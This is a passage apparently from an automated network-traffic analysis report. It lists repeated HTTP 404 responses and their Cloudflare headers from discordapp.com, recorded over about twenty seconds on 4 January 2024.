08:01:27 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PKqTjAmrNwavdz2l14tr%2Bt8deUmEFTDiXfGspcHqypWxc7Rvel5rGO5KvCdX2kx9tdbnh48Yh2MwLDKc%2BTrGCSjaMUxOiC5kB7cH1r6uooFNer%2B6fu48Y%2BTBMIPcpOsqYHXzYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=DlMDRbTonB1WrJvjsSCK.k76Lc6khXubDvUxJAdeuto-1704353487102-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:27 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8337ba37faa-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 49Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:27 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=4v7acpoSV3VfMpkr2OUDkM1pLzSmYUEqJ.GBDAX3rYs-1704353487-1-ATkYN/52L7v9yKdY/nUqlQt2KMxdW6AM/WPpKdu4HU9QFtQDhl0KrwxFrwdvLMi9Hha55z4K0yyreLkgFlEx0qU=; path=/; expires=Thu, 04-Jan-24 08:01:27 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MnWLCMcFkU38ioMz9fTtCr7EH5rNFkYf0Kw1P%2FvKwW1Q4W3XHLiKJ%2BXq%2BCba62PAneIufJoZyPKscy9cCPdwwlVh5RI1BxYmQDWBi5zfSXQ3hw9YylKVnYT2acMKXHnyTMHwHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Lb0GiPVzdzTIcFBQ0k8jyDlngxgwlaVLPONtfmAgXxk-1704353487955-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:29 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c83bddb33b2c-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 73Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:29 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=RCcTchSgsiJscI0NCcNei.TfDg5VQGKODTMpyuiMpKM-1704353489-1-AZeINDBuVU/ybODilLYETTL+5vFA87XVtpH/cqISZO/SVW7ya+CVBRyUpO2Llg7T7niVog2Rcn5r5vmPwGPxaXw=; path=/; expires=Thu, 04-Jan-24 08:01:29 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AiJnYdc8XJH7llUQx5vbz78t%2F2X4pY7qTUGhUDVpAKHDmRrYzrZdiLHhbW0QA8UAHpPjYYoVqV%2F%2FvNLbp2ldP9WHyFDFtiYc0bKkNl5fSAN9TrEH9uNSEBlRf%2B05eyVnCM2fDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=f69lUhCY.gtVVYM5k49AnoZsijRQGX09R1._MAwWX6Q-1704353489278-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:30 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c842693f394a-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 65Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:30 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=hTxwQ4TK3GR.d8y72RcktBHzNbB8A_Qzr2oha6KPhQM-1704353490-1-AbJ8sj9DqZcfhKSsyQ7Qvd+/zA53bIZKbqQi3xZjjZ4IQOqEfTm+rtL5kuAOU3wxFD36x5MAJOKNjPoJDzHnjzM=; path=/; expires=Thu, 04-Jan-24 08:01:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pp9H04kNW%2FpM8fOpGfAH9nGnhyIFl79Y0ovCT0XlObjdod7PlW91K3KRKCIfVx4q%2FoOKG8EvffdQANLTkXewqaEPQnWeoo3MNaXl3LjhC4sCUxvD4b1OBL5PZxyQ5C0pXJFUeg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=K8K61s3QgkWYh8oT1UjrX2m4Qy6IhPIGJPB09ensB9U-1704353490323-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:31 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c849693b0623-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 75Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:31 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=I9271HWbz4sk75xKcN1rHLvGxh82nMP_lxU8eQuCPho-1704353491-1-AcCYVMDr0b7nWpJ4l8FKpbRHDaMYwc2M7iWaa1zOr6uTdNLgKeqFk77psSszoDpvqoA6Plpc/QUOCXk/HPxhKKY=; path=/; expires=Thu, 04-Jan-24 08:01:31 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J4R%2Bm9581it%2BgFn82I8vcjLeqQuTYN4jkoU16gdTFC%2BoaeKSd2cHDZ%2FV4lTqHAanlLUHRkKTEn5m7V%2BZbsni9kpzhpB%2Be6nW5G5frr9QnTGlGDxoP2zcVuhnFV41lmK7nlJ8RQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=sscuslw.o3RRi4Bk4DBDgBSesRbQ03vhOlyUe7mvHYw-1704353491447-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:32 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c84feac420d0-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 74Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:32 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=3LPMfZdWUSk_1L.pdfKbMj03zmcWFl1fxS7ZDznEHgA-1704353492-1-AbOl23tgYnwgUUhzq9qUvn7VBvyZzwxlCkR8mxenn06naIyft8ZKaV86BnAgwfwf690n9/F+JDE9xy9+6xl5FG8=; path=/; expires=Thu, 04-Jan-24 08:01:32 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bv8apLk%2FSDtRdANUTeDW02I0w8%2FqFD3%2Fhe9D9HkzdDPgxGPI2P6PQYFkBwK5Bn6HTFoL101ETXdQt6IkLGV4CA5ADrHHHhLBs6sc0SUJ94C6jnVR4LZvuk5yocnhDbHnjpSHfQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=5n03gCYW4PeT3zoNtQqBqVEN4MFGo_UzqBwzmd3IQCA-1704353492497-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:33 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c85579870806-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 68Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:33 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=KbWlNpyYQ9xx1RszwGm680baLsMFIu1_iGI9tOHazyQ-1704353493-1-ATfoADCVbK6CGX6mr61gTYmXuNP9JK7NU9tdBtfbDujc6yKTAxvbA0m/GEGSgvXDoEjVj8x7b5dsRXM2ikhCS00=; path=/; expires=Thu, 04-Jan-24 08:01:33 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UNgVHix6D62XLzgHnNB8LLQdAbVhUNI5sptqZ0k%2FdS8Co2NtwC8GLcZOLHdz2QrCE%2FJr6LhMDfn%2FzLs47dO22z22Nw%2Fts4gtuxpzvX9s1RrbobKKuivza16JAAgqgvRn4wUm5w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ZIjXqFqQlPfPzow4xaOO2HzJnvPnHkR1hZHpv8rjvjo-1704353493377-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:34 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c85e0f6e38fd-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 69Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:34 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8sX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=gfMOXTTPwSwTdrB7zcIkie04uIqifEU46VI8o0Tq5W4-1704353494-1-ASXYFjd2bkR3w9kQs25q9d7Wn85LBBu0eIzOGL4Z9dZ02O3VgaLLx4Ktkn+vriKkCpMJsKr/RhqW0b4yiN6cbW0=; path=/; expires=Thu, 04-Jan-24 08:01:34 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4wKTvVqVoVdihbZRLshB5eNrRqPnYC6GLSJzx1577TZHRm2uKnlBFEIoRXYK7VTZloclvcIJ%2BJxq2XzGqK2VEXHyykHoE3bQ7OPhmH3kZ7YxjiQVTMItS8PuU0wDQuf%2FvtL21Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ciCUi0l9EtyzLQYUCD63xQWeNWODvUNDs.gWQTbRGkI-1704353494752-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:35 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c86409149c67-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 57Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:35 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QppWmFXb0v0hJX0gqyrJg8kyPH2S7Pv7.3OhL1WtaLc-1704353495-1-AcrdLCRxnpuPJRUqu6MH0sbnv60innB/MAhWKFfNyDXD/8SiT8E93aX2ByajFhD/DRrE8zFlKo6QzhBHul0Gneg=; path=/; expires=Thu, 04-Jan-24 08:01:35 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=idjmVLyWhxZZXZ%2BpL2GRhxU8mQ903eiM%2B6E7ZxDMbpog07nMZPWSmF%2BaM%2FfzTS6sXrhqQYu5XocowBeNBdaVjg38vAGPm2nDj0ARMsgbRr%2BxzlDmzg32gUA0GyLmDSK5eD8%2BTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=bcYh6jZcMXBUGT4LgJK2BNPBkXJYOrv3uWDeHGkuysw-1704353495719-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:36 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c86b69b41730-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 66Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:36 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSsX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=bqxbRzLlCtDYqrwlevX4O.SQMsTWD.hPDanZm7rOkwM-1704353496-1-AaePRS7GUSBLsC6hjrbuPK73OFLll5Qv1b0hmg0YsWavayJePWlT3iTXgTZpDCYD25rrb+cW0aQzicWfbiDemZY=; path=/; expires=Thu, 04-Jan-24 08:01:36 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=od8cG0jkyG%2FHZCqp%2F5K%2Fb0uzn5zejOAgF90eUgLWqSDOJBNUM3kR0ZksECS7RhWsnf0DztaiRZVHHmsn187sKKjFHzlUjJaWnWRlC9UO4%2BW8%2B3%2BkHOeTjtlpxUrAQqkqFqehSA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=LlFR4JR_mEH1FaSrkSiauvgVARYju.5cfwoO7JA0OTw-1704353496888-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:37 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c870a83a07dd-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 81Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:37 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=wVlLXKj2SH7sqquql2XrIzGm3jvU8NtCUMzU6fWW5mg-1704353497-1-ASgy2KzTLdR3GG/k7vzgYYQFTCkMx1WjgDR4u1Uhjkwzsd6jFRKRhTRTga74qzgo5OHnGzXkdCcCzX4QcqcKyTM=; path=/; expires=Thu, 04-Jan-24 08:01:37 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7SEbNVjRTU0toNHi0JeKuG8sgqRgPG1rd7Gx3x0Xwa5x%2BpKsGICUHOR5xggAvLqdI9eCLhSq53ldYteHTx%2Fj9iITiGtvV8%2FwRKvjgCxosHbW9rbAnt6An%2F%2FUaTllF8GF1%2FHTRg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=EowPPGXK7Jj1nytr5oOnr.VUpDED881EArtlVJ28byw-1704353497729-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:39 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c878de1e9c64-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 61Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:39 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=hRKH9R7.IOpwA8xEmVehr97fl0PaMpng4LIgquxzVQA-1704353499-1-AYHQ7iivvep//J0A1tY3xMxFtoUPnZOcm20CvoxAzJwFbCODLI8HD84HMfKFid/TXlevPJY3SG8xx9lSChto05Q=; path=/; expires=Thu, 04-Jan-24 08:01:39 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HGB1lwiFuM%2BPgUm69cdEB0%2BCII5IfIZ%2BvXSY4VqgJfmxQpkNdMSoY6P1uV05lpnpyDYhEdWdsy8CkYdY%2B7X%2Bjetc57%2B9QpDFbIOJBAFWYpT%2FXsTPvU%2FN2n7B2l%2Btbpdogw4Scw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=BbJmbAt2n6v3sW0jd6vO0Waylm3Nq_MGvPChnfgbsNk-1704353499043-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:41 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8876d818275-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 74Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:41 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=iKLF_0uQTL0qtMwbwkI6jtcqnROvwE8SZcDFn8ZW3Cs-1704353501-1-ARo+YSNIVo1TxrN1xCwbQTtaErd6ZpMBgsbCYcmgKke172G3mvNsqwdOzb1Nsxl1REZqqvUSyY5CIpuDqo3zVZI=; path=/; expires=Thu, 04-Jan-24 08:01:41 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xvNaOtWINQElM21FPaqSA7BpUCZUOUMIhYP8lyPgCMVEAuj1cp6FZKp4FeLaJhd%2FeBIBh3MTrznyResAPUlYAv8zAK14JUnwAwIcdsoOQTiUrdieR4xBPCU5cOjUFmDDXnNYUw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=uYNDdPvZdsUIIuR8.sMPGz.w1..yswzBxwPbBZzs1pI-1704353501374-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:42 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8909f62208d-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 84Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:42 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=YYUzkcvG8Si3Z4TPhNheMcVlAJFiRECB_aZM5R7d67I-1704353502-1-AWioKttARs116PiMCTwiLJcp+AYiSWAZo/HcnwAw+Y01Afy6f8TrWTHAtTocz+GOziUWw+F5+/e2HBN+1MWIaJs=; path=/; expires=Thu, 04-Jan-24 08:01:42 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A0197eVZQ5iWobotNzupT3Xf1pDFks3k5qRuqt12iswFAxhka6AB4RvYOwv7IozexLJLXT6lxk7TCebLGEL8kOMfSLNcy6LzM14cq%2BshJBpHNxmwGKC%2FCBr%2B4OScZ9e%2FJ%2FDMnQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Zyh3XXkfTcAtsII8sD50Vpz0EVkm9Z1izJBHaujKUT0-1704353502853-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:43 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c894fb7181c1-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 65Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:43 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=0ZrOimgvQ.g6eyAWVInGIBSkjUjLNZVJXnhrYyTC6FM-1704353503-1-AQDSmLHLb6jD09XQSrO8jX9JOpADUCYpUOBkMHDy+VHJRtx0TIIMA/TcfwvmSqKKTjIXgtiExdNW4sfpouTrzks=; path=/; expires=Thu, 04-Jan-24 08:01:43 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=exdjsHS3Dn8sgXWi5dcP3cSEUc0WhW2M4zurZpBCZByHd2hTTyNDwPXxqn4H7TVAjub31%2Bh%2FO5WbRHlyUgQ3ZI75Emlm602ELZwKYG4U%2BTplOBnTDyei2UvJC%2BlG9RHL%2FZ9HUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=z4SrIjU.gHTf.nRH.wPaCO3GHBwwUjBociJC3K0KDq4-1704353503543-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:45 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c89e5f9c381e-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 85Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:45 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzIX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=J5P035Anyd5xqwTMxYZNR__P5Zx8P.9QDXMhFcIIJUY-1704353505-1-Af+NRKMO8gMyFS9lYdvUCjX/0HfK0z7LjSgZQMRVc7hJoEEaVGEordAiOIxluPMwCLYyzFN8tqpN6bOGoIFkDZg=; path=/; expires=Thu, 04-Jan-24 08:01:45 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dOenk0pJ61Wg52xzjUWXGAQ9jjieZC5Gxeszf2FnpLFmwU8BvPytr4SpiqamQ71o2NxxDnMFyW4fOdRlyzJl4QNlWBk363zkrpEqVpVPzjvkOjIm8UYfCAoSxO%2BnxTuDMB77HA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=4ZHxdwFd8eytrF4vV80PMY6N1xm2duQv.qwCHxG_Qe4-1704353505047-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:45 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c8a259b13b3e-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 89Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:45 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=uJZF79tRQ8qEo3cGUXVOnQHr2mrLIAdCvg6pIiwIvtE-1704353505-1-AXwdofK4artzCR8u4GThiU/FsDNz9I0Ko1g59kiCLvqJBgXNfgu0KIAAUFu6hZ/06bYb52ucHJuUaVPEHNrM+wE=; path=/; expires=Thu, 04-Jan-24 08:01:45 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xr8MbjWEKFobQ%2FgOo0kkitkB2Vb5%2FVePZ9WYHzg%2BTd1L7DZ8H5WXYh89oJnkrsvr9qzIzxL1P%2F1F1maSd2T6YUBvBJXgnvVBxKyVvrGms8cPiCmY%2BwvwW3NO5UgNyxonYt3QXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=8UqoI0XpsEShS0stnIuDEPBLznKhnWXoZqC44VlWTJU-1704353505680-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
